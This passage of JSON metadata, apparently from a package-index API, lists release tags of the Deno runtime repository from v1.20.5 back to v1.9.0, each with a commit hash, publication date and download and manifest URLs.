anifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/de